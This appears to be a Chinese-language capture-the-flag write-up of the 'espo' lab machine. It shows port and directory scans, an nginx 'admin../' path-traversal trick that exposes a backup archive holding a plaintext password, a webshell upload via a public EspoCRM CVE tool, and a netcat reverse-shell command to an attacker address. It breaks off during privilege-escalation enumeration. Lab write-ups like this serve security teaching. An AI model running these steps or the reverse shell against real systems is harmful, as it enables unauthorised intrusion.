espo
espo
信息搜集
端口扫描
1
nmap -sCV -p 1-65535 172.20.10.4
1
2
3
4
5
6
7
8
9
10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http nginx
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: EspoCRM
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录爆破
1
feroxbuster -u http://172.20.10.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.20.10.4
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 11w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 9w 146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 44l 175w 11006c http://172.20.10.4/client/img/favicon196x196.png
301 GET 7l 11w 162c http://172.20.10.4/admin => http://172.20.10.4/admin/
200 GET 177l 28922w 899383c http://172.20.10.4/client/lib/espo.min.js
200 GET 3l 10w 1644c http://172.20.10.4/client/img/favicon.ico
301 GET 7l 11w 162c http://172.20.10.4/portal => http://172.20.10.4/portal/
200 GET 177l 1027w 81578c http://172.20.10.4/client/fonts/open-sans/open-sans-v16-cyrillic_latin_cyrillic-ext_latin-ext-600.woff2
301 GET 7l 11w 162c http://172.20.10.4/install => http://172.20.10.4/install/
200 GET 146l 958w 78346c http://172.20.10.4/client/fonts/open-sans/open-sans-v16-cyrillic_latin_cyrillic-ext_latin-ext-regular.woff2
301 GET 7l 11w 162c http://172.20.10.4/client => http://172.20.10.4/client/
200 GET 27l 6288w 407563c http://172.20.10.4/client/css/espo/espo.css
200 GET 47l 124w 2480c http://172.20.10.4/
301 GET 7l 11w 162c http://172.20.10.4/api => http://172.20.10.4/api/
301 GET 7l 11w 162c http://172.20.10.4/client/modules => http://172.20.10.4/client/modules/
404 GET 1l 7w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 11w 162c http://172.20.10.4/client/img => http://172.20.10.4/client/img/
301 GET 7l 11w 162c http://172.20.10.4/install/css => http://172.20.10.4/install/css/
301 GET 7l 11w 162c http://172.20.10.4/install/js => http://172.20.10.4/install/js/
301 GET 7l 11w 162c http://172.20.10.4/client/css => http://172.20.10.4/client/css/
301 GET 7l 11w 162c http://172.20.10.4/api/v1 => http://172.20.10.4/api/v1/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm => http://172.20.10.4/client/modules/crm/
301 GET 7l 11w 162c http://172.20.10.4/client/lib => http://172.20.10.4/client/lib/
301 GET 7l 11w 162c http://172.20.10.4/install/img => http://172.20.10.4/install/img/
301 GET 7l 11w 162c http://172.20.10.4/client/src => http://172.20.10.4/client/src/
301 GET 7l 11w 162c http://172.20.10.4/client/custom => http://172.20.10.4/client/custom/
301 GET 7l 11w 162c http://172.20.10.4/client/custom/modules => http://172.20.10.4/client/custom/modules/
401 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 11w 162c http://172.20.10.4/client/src/collections => http://172.20.10.4/client/src/collections/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/css => http://172.20.10.4/client/modules/crm/css/
301 GET 7l 11w 162c http://172.20.10.4/client/src/ui => http://172.20.10.4/client/src/ui/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/lib => http://172.20.10.4/client/modules/crm/lib/
301 GET 7l 11w 162c http://172.20.10.4/client/modules/crm/src => http://172.20.10.4/client/modules/crm/src/
301 GET 7l 11w 162c http://172.20.10.4/client/css/misc => http://172.20.10.4/client/css/misc/
301 GET 7l 11w 162c http://172.20.10.4/client/res => http://172.20.10.4/client/res/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views => http://172.20.10.4/client/src/views/
301 GET 7l 11w 162c http://172.20.10.4/client/src/models => http://172.20.10.4/client/src/models/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates => http://172.20.10.4/client/res/templates/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/user => http://172.20.10.4/client/res/templates/user/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/email => http://172.20.10.4/client/res/templates/email/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/site => http://172.20.10.4/client/res/templates/site/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/user => http://172.20.10.4/client/src/views/user/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/email => http://172.20.10.4/client/src/views/email/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/site => http://172.20.10.4/client/src/views/site/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/admin => http://172.20.10.4/client/src/views/admin/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/portal => http://172.20.10.4/client/src/views/portal/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/admin => http://172.20.10.4/client/res/templates/admin/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/template => http://172.20.10.4/client/src/views/template/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/team => http://172.20.10.4/client/src/views/team/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/event => http://172.20.10.4/client/src/views/event/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/preferences => http://172.20.10.4/client/src/views/preferences/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/export => http://172.20.10.4/client/src/views/export/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/settings => http://172.20.10.4/client/src/views/settings/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/template => http://172.20.10.4/client/res/templates/template/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/event => http://172.20.10.4/client/res/templates/event/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/record => http://172.20.10.4/client/src/views/record/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/note => http://172.20.10.4/client/src/views/note/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/attachment => http://172.20.10.4/client/src/views/attachment/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/preferences => http://172.20.10.4/client/res/templates/preferences/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/export => http://172.20.10.4/client/res/templates/export/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/settings => http://172.20.10.4/client/res/templates/settings/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/record => http://172.20.10.4/client/res/templates/record/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/attachment => http://172.20.10.4/client/res/templates/attachment/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/errors => http://172.20.10.4/client/res/templates/errors/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/stream => http://172.20.10.4/client/res/templates/stream/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/import => http://172.20.10.4/client/res/templates/import/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/role => http://172.20.10.4/client/src/views/role/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/fields => http://172.20.10.4/client/src/views/fields/
301 GET 7l 11w 162c http://172.20.10.4/client/src/views/notification => http://172.20.10.4/client/src/views/notification/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/role => http://172.20.10.4/client/res/templates/role/
301 GET 7l 11w 162c http://172.20.10.4/client/res/templates/fields => http://172.20.10.4/client/res/templates/fields/
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fblogs
404 GET 1l 39w 595c http://172.20.10.4/api/v1/**http%3A%2F%2Fwww
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fcommunity
404 GET 1l 39w 595c http://172.20.10.4/api/v1/http%3A%2F%2Fradar
[###################>] - 17m 5485066/5513669 0s found:71 errors:3816615
[####################] - 7m 220546/220546 495/s http://172.20.10.4/
[####################] - 8m 220546/220546 447/s http://172.20.10.4/admin/
[###################>] - 17m 211338/220546 208/s http://172.20.10.4/portal/
[####################] - 7m 220546/220546 493/s http://172.20.10.4/install/
[####################] - 7m 220546/220546 517/s http://172.20.10.4/client/
[####################] - 7m 220546/220546 505/s http://172.20.10.4/api/
[####################] - 8m 220546/220546 470/s http://172.20.10.4/client/modules/
[####################] - 7m 220546/220546 517/s http://172.20.10.4/client/img/
[####################] - 7m 220546/220546 495/s http://172.20.10.4/install/css/
[####################] - 7m 220546/220546 499/s http://172.20.10.4/install/js/
[####################] - 8m 220546/220546 470/s http://172.20.10.4/client/css/
[##################>-] - 17m 200975/220546 198/s http://172.20.10.4/api/v1/
[####################] - 8m 220546/220546 479/s http://172.20.10.4/client/modules/crm/
[####################] - 7m 220546/220546 518/s http://172.20.10.4/client/lib/
[####################] - 8m 220546/220546 482/s http://172.20.10.4/install/img/
[####################] - 8m 220546/220546 449/s http://172.20.10.4/client/src/
[####################] - 8m 220546/220546 462/s http://172.20.10.4/client/custom/
[####################] - 8m 220546/220546 482/s http://172.20.10.4/client/custom/modules/
[####################] - 8m 220546/220546 454/s http://172.20.10.4/client/src/collections/
[####################] - 8m 220546/220546 453/s http://172.20.10.4/client/src/ui/
[####################] - 8m 220546/220546 463/s http://172.20.10.4/client/css/misc/
[####################] - 8m 220546/220546 466/s http://172.20.10.4/client/res/
[####################] - 8m 220546/220546 485/s http://172.20.10.4/client/src/views/
[####################] - 8m 220546/220546 454/s http://172.20.10.4/client/src/models/
[####################] - 7m 220546/220546 490/s http://172.20.10.4/client/res/templates/
过慢,一边做一边扫,还没扫完,但是已经没啥用了。
漏洞挖掘
实地勘探
敏感目录查询
http://172.20.10.4/admin/
http://172.20.10.4/portal/
http://172.20.10.4/install -> http://172.20.10.4/
http://172.20.10.4/robots.txt
User-agent: *
Disallow: /
http://172.20.10.4/client/css/espo/espo.css
尝试ctrl+f没有找到明显的东西。
其他目录看了,都没什么东西,甚至还有一个是google的字体:
搜索中间件历史漏洞
因为不是刚出来就做的,不清楚作者是不是考察这个。
1
2
3
searchsploit nginx 1.22.1
Exploits: No Results
Shellcodes: No Results
google搜索一下,没啥发现。
信息搜集
没收获就是没有搜集全。。。重新扫描:
尝试多个字典都没有收获,感觉问题不对劲,看了一下wp,发现我靶机部署可能出了点问题。。。。重启一下靶机:
对胃了,之前估计出错了,没部署成功,重新fuzz一下:
1
ffuf -u http://172.20.10.4/admin../FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
1
2
3
4
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 2ms]
[Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 3ms]
_oldsite [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 2ms]
:: Progress: [30000/30000] :: Job [1/1] :: 7407 req/sec :: Duration: [0:00:02] :: Errors: 2 ::
这种构造方式源于nginx错误配置导致的,我们实验发现:
http://172.20.10.4/admin../
http://172.20.10.4/ -> http://172.20.10.4/
http://172.20.10.4/admin../_oldsite/
1
ffuf -u http://172.20.10.4/admin../_oldsite/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
1
info [Status: 200, Size: 540, Words: 72, Lines: 12, Duration: 104ms]
http://172.20.10.4/admin../_oldsite/info
会下载一个文件,如下:
1
2
3
4
5
6
7
8
9
10
11
# Backup Configuration Settings
# This configuration file dictates the backup protocols for critical data storage.
# Directory for storing backup files
# All backup files are stored in compressed ZIP format for efficient space usage and security.
# Ensure that backups are regularly updated and verified for data integrity.
backup_directory: /admin/_oldsite
backup_format: zip
# Note: The backup directory is designated for ZIP file backups only.
# Regular maintenance and checks are required to ensure data consistency and reliability.
发现有备份文件存在,重新扫一下:
1
ffuf -u http://172.20.10.4/admin../_oldsite/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .zip
1
2
backup.zip [Status: 200, Size: 37975754, Words: 0, Lines: 0, Duration: 0ms]
info [Status: 200, Size: 540, Words: 72, Lines: 12, Duration: 1ms]
分析备份文件
至此,搜集终于告一段落,尝试把文件请求下来:
1
wget http://172.20.10.4/admin../_oldsite/backup.zip
查看配置文件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali💀kali)-[~/temp/espo]
└─$ find ./ -name *config 2>/dev/null
./web.config
./public/portal/web.config
./public/api/v1/web.config
./public/api/v1/portal-access/web.config
┌──(kali💀kali)-[~/temp/espo]
└─$ find ./ -name config* 2>/dev/null
./data/config-internal.php
./data/config.php
./install/core/afterInstall/config.php
./install/core/config.php
./install/config.php
./install/vendor/smarty/demo/configs
./application/Espo/Resources/defaults/config.php
./application/Espo/Resources/metadata/app/config.json
./vendor/laminas/laminas-zendframework-bridge/config
./vendor/league/flysystem/config.subsplit-publish.json
./vendor/tecnickcom/tcpdf/config
./vendor/tecnickcom/tcpdf/examples/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/fi/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/sv/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/fr/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/nl/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/en/uk/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/no/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pl/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/bg/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pt/br/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/pt/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/cs/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/hu/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/ru/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/da/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/de/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/it/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/tr/config
./vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/locale/es/config
查看一下这些配置文件,在./data/config.php发现账号密码:
.......
'smtpUsername' => 'admin',
'smtpPassword' => '39Ue4kcVJ#YpaAV24CNmbWU',
.......
尝试进行登录:
查询漏洞
因为是2022版本的,尝试查询相关漏洞:
并非我们想要的,我们看一下它的版本:
google一下是否有相关漏洞:
结合靶机创建时间推断,可能是后面两个:
搜索一下有无相关payload:
找到一个验证工具:https://github.com//cve-2023-5966
看看能不能用:
然后会提示安装,直接安装即可,成功会出现以下界面:
看一下webshell.php:
反弹一个shell:
1
nc -e /bin/bash 172.20.10.8 1234
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
(remote) www-data@espo:/var/www/html/public$ ls -la
total 36
drwxr-xr-x 5 www-data www-data 4096 Apr 4 08:20 .
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 ..
drwxr-xr-x 3 www-data www-data 4096 Dec 4 15:42 api
-rw-r--r-- 1 www-data www-data 1689 Dec 4 15:42 index.php
drwxr-xr-x 5 www-data www-data 4096 Dec 4 15:42 install
-rw-r--r-- 1 www-data www-data 1660 Dec 4 15:42 oauth-callback.php
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 portal
-rw-r--r-- 1 www-data www-data 26 Dec 4 15:42 robots.txt
-rw-r--r-- 1 www-data www-data 302 Apr 4 08:20 webshell.php
(remote) www-data@espo:/var/www/html/public$ cd ..
(remote) www-data@espo:/var/www/html$ ls -la
total 136
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 .
drwxr-xr-x 4 root root 4096 Dec 4 15:42 ..
-rw-r--r-- 1 www-data www-data 1153 Dec 4 15:42 .htaccess
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 EspoCRM-7.2.4
-rw-r--r-- 1 www-data www-data 35819 Dec 4 15:42 LICENSE.txt
drwxr-xr-x 3 www-data www-data 4096 Dec 4 15:42 application
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 bin
-rw-r--r-- 1 www-data www-data 1498 Dec 4 15:42 bootstrap.php
-rw-r--r-- 1 www-data www-data 1543 Dec 4 15:42 clear_cache.php
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 client
-rw-r--r-- 1 www-data www-data 1536 Dec 4 15:42 command.php
-rw-r--r-- 1 www-data www-data 1531 Dec 4 15:42 cron.php
drwxrwxr-x 3 www-data www-data 4096 Dec 4 15:42 custom
-rw-r--r-- 1 www-data www-data 1535 Dec 4 15:42 daemon.php
drwxrwxr-x 7 www-data www-data 4096 Apr 4 08:20 data
-rw-r--r-- 1 www-data www-data 2812 Dec 4 15:42 extension.php
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 html
-rw-r--r-- 1 www-data www-data 3170 Dec 4 15:42 index.php
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 install
-rw-r--r-- 1 www-data www-data 1537 Dec 4 15:42 preload.php
drwxr-xr-x 5 www-data www-data 4096 Apr 4 08:20 public
-rw-r--r-- 1 www-data www-data 1537 Dec 4 15:42 rebuild.php
-rw-r--r-- 1 www-data www-data 3034 Dec 4 15:42 upgrade.php
drwxr-xr-x 39 www-data www-data 4096 Dec 4 15:42 vendor
-rw-r--r-- 1 www-data www-data 2534 Dec 4 15:42 web.config
-rw-r--r-- 1 www-data www-data 1541 Dec 4 15:42 websocket.php
(remote) www-data@espo:/var/www/html$ cd ..
(remote) www-data@espo:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Dec 4 15:42 .
drwxr-xr-x 13 root root 4096 Dec 7 19:46 ..
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 config
drwxr-xr-x 12 www-data www-data 4096 Dec 4 15:42 html
(remote) www-data@espo:/var/www$ cd config/
(remote) www-data@espo:/var/www/config$ ls -la
total 16
drwxr-xr-x 4 www-data www-data 4096 Dec 4 15:42 .
drwxr-xr-x 4 root root 4096 Dec 4 15:42 ..
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 _oldsite
drwxr-xr-x 2 www-data www-data 4096 Dec 4 15:42 admin
(remote) www-data@espo:/var/www/config$ cd ../../
(remote) www-data@espo:/var$ ls -la
total 52
drwxr-xr-x 13 root root 4096 Dec 7 19:46 .
drwxr-xr-x 18 root root 4096 Dec 4 07:02 ..
drwxr-xr-x 2 root root 4096 Apr 4 07:44 backups
drwxr-xr-x 11 root root 4096 Jan 26 19:42 cache
drwxr-xr-x 38 root root 4096 Dec 6 19:22 lib
drwxrwsr-x 2 root staff 4096 Mar 2 2023 local
lrwxrwxrwx 1 root root 9 Jun 15 2023 lock -> /run/lock
drwxr-xr-x 9 root root 4096 Apr 4 06:45 log
drwxrwsr-x 2 root mail 4096 Jan 24 20:01 mail
drwxr-xr-x 2 root root 4096 Jun 15 2023 opt
lrwxrwxrwx 1 root root 4 Jun 15 2023 run -> /run
drwxrwxrwt 2 root root 4096 Jan 24 19:57 shared_medias
drwxr-xr-x 7 root root 4096 Dec 6 19:22 spool
drwxrwxrwt 5 root root 4096 Apr 4 08:09 tmp
drwxr-xr-x 4 root root 4096 Dec 4 15:42 www
(remote) www-data@espo:/var$ mail
"/var/mail/www-data": 1 message 1 new
>N 1 Mail Delivery Syst Wed Jan 24 20:01 71/2178 Undelivered Mail Returned to Sender
?
X-Original-To: www-data@nc-ass-vip.sdv.fr
Date: Wed, 24 Jan 2024 20:01:19 +0100 (CET)
From: Mail Delivery System <MAILER-DAEMON@espo.hmv>
Subject: Undelivered Mail Returned to Sender
To: www-data@nc-ass-vip.sdv.fr
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="B282E871.1706122879/espo.hmv"
Content-Transfer-Encoding: 8bit
This is a MIME-encapsulated message.
--B282E871.1706122879/espo.hmv
Content-Description: Notification
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
This is the mail system at host espo.hmv.
I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to postmaster.
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
<mandie@espo.hmv> (expanded from <mandie>): Command time limit exceeded:
"/dev/shm/pwn"
--B282E871.1706122879/espo.hmv
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; espo.hmv
X-Postfix-Queue-ID: B282E871
X-Postfix-Sender: rfc822; www-data@nc-ass-vip.sdv.fr
Arrival-Date: Wed, 24 Jan 2024 19:44:39 +0100 (CET)
Final-Recipient: rfc822; mandie@espo.hmv
Original-Recipient: rfc822;mandie@espo.hmv
Action: failed
Status: 5.3.0
Diagnostic-Code: x-unix; internal software error
--B282E871.1706122879/espo.hmv
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Return-Path: <www-data@nc-ass-vip.sdv.fr>
Received: by espo.hmv (Postfix, from userid 33)
id B282E871; Wed, 24 Jan 2024 19:44:39 +0100 (CET)
Subject: lol
To: mandie@espo.hmv
User-Agent: mail (GNU Mailutils 3.15)
Date: Wed, 24 Jan 2024 19:44:39 +0100
Message-Id: <20240124184439.B282E871@espo.hmv>
From: www-data <www-data@nc-ass-vip.sdv.fr>
pwned
--B282E871.1706122879/espo.hmv--
这是被钓鱼了?继续搜集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
(remote) www-data@espo:/$ crontab -l
no crontab for www-data
(remote) www-data@espo:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
(remote) www-data@espo:/$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
Debian-exim:x:104:112::/var/spool/exim4:/usr/sbin/nologin
faxmaster:x:105:113:HylaFAX administrative mailbox,,,:/var/spool/hylafax:/usr/sbin/nologin
avahi:x:106:114:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
geoclue:x:107:115::/var/lib/geoclue:/usr/sbin/nologin
mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:117::/var/spool/postfix:/usr/sbin/nologin
mandie:x:1000:1000:,,,:/home/mandie:/bin/zsh
(remote) www-data@espo:/$ cd /etc
(remote) www-data@espo:/etc$ ls
ImageMagick-6 console-setup ethertypes initramfs-tools magic.mime pam.d resolvconf sudoers.d
ModemManager cron.d exim4 inputrc mail.rc papersize rmt sv
NetworkManager cron.daily fonts insserv.conf.d mailcap passwd rpc sysctl.conf
X11 cron.hourly fstab iproute2 mailcap.order passwd- rsyslog.d sysctl.d
adduser.conf cron.monthly gai.conf issue mailname perl runit systemd
adjtime cron.weekly geoclue issue.net manpath.config php security terminfo
aliases cron.yearly ghostscript kernel mime.types polkit-1 selinux timezone
aliases.db crontab groff kernel-img.conf mke2fs.conf postfix sensors.d tmpfiles.d
alternatives dbus-1 group ld.so.cache modprobe.d ppp sensors3.conf ucf.conf
anacrontab debconf.conf group- ld.so.conf modules profile services udev
apache2 debian_version grub.d ld.so.conf.d modules-load.d profile.d sgml ufw
apparmor default gshadow ldap motd protocols shadow update-motd.d
apparmor.d deluser.conf gshadow- libaudit.conf mtab python3 shadow- usb_modeswitch.conf
apt dhcp gss libnl-3 mysql python3.11 shells usb_modeswitch.d
avahi dictionaries-common gssapi_mech.conf libpaper.d nanorc rc0.d skel vim
bash.bashrc discover-modprobe.conf gtk-3.0 locale.alias netconfig rc1.d ssh wgetrc
bash_completion discover.conf.d host.conf locale.gen network rc2.d ssl wpa_supplicant
bash_completion.d dpkg hostname localtime networks rc3.d subgid xattr.conf
bindresvport.blacklist e2scrub.conf hosts logcheck nftables.conf rc4.d subgid- xdg
binfmt.d emacs hosts.allow login.defs nginx rc5.d subuid xml
bluetooth email-addresses hosts.deny logrotate.conf nsswitch.conf rc6.d subuid- zsh
ca-certificates enscript.cfg hylafax logrotate.d opt rcS.d sudo.conf
ca-certificates.conf environment ifplugd machine-id os-release reportbug.conf sudo_logsrvd.conf
chatscripts environment.d init.d magic pam.conf resolv.conf sudoers
(remote) www-data@espo:/etc$ cd /opt
(remote) www-data@espo:/opt$ ls
(remote) www-data@espo:/opt$ ls -la
total 8
